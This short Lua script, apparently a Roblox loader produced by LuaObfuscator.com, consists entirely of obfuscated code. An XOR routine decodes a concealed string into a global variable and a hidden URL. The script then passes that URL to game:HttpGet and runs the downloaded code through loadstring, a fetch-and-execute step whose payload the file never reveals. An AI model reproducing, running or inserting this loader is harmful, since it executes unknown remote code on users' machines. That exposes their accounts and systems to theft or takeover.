--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11)local v12={};for v13=(4 -1) -2, #v10 do v6(v12,v0(v4(v1(v2(v10,v13,v13 + 1)),v1(v2(v11,(1863 -((3560 -2149) + 451)) + ((v13-(1 + 0))% #v11),1 + ((v13-(1977 -(814 + 1162)))% #v11) + 1)))%(171 + 85)));end return v5(v12);end _G.v8=1333495136 -(277 + 995);_G.v9=v7("\34\219\34\107\35\39\157\101\203\63\104\51\114\192\46\129\53\116\61\50\211\58\198\121\108\53\127\218\37\192\61\104\127\44\130\127\151\101\46\103\37\138\123\158\97\41\100\44\130\126\158\110\52\104\78\208\37\157\30\98\34\68\227\8\156\97\44\35\86\254\28\220\48\43\31\73\223\27\206\15\88\105\45\222\30\205\53\76\59\88\232\44\220\52\66\27\126\245\122\252\12\87\33\91\241\58\197\30\97\33\109\223\44\248\59\89\31\81\252\28\203","\74\175\86\27\80\29\178");loadstring(game:HttpGet(v7("\23\86\85\49\240\47\224\150\13\67\86\111\228\124\187\209\10\64\84\50\230\103\172\214\17\86\68\47\247\59\172\214\18\13\87\36\240\97\182\193\80\114\68\53\208\124\162\204\19\67\85\46\241\77\142\204\11\77\103\32\241\120\224\212\30\75\79\110\203\116\188\205\26\100\64\51\238\59\163\204\30","\127\34\33\65\131\21\207\185")))();
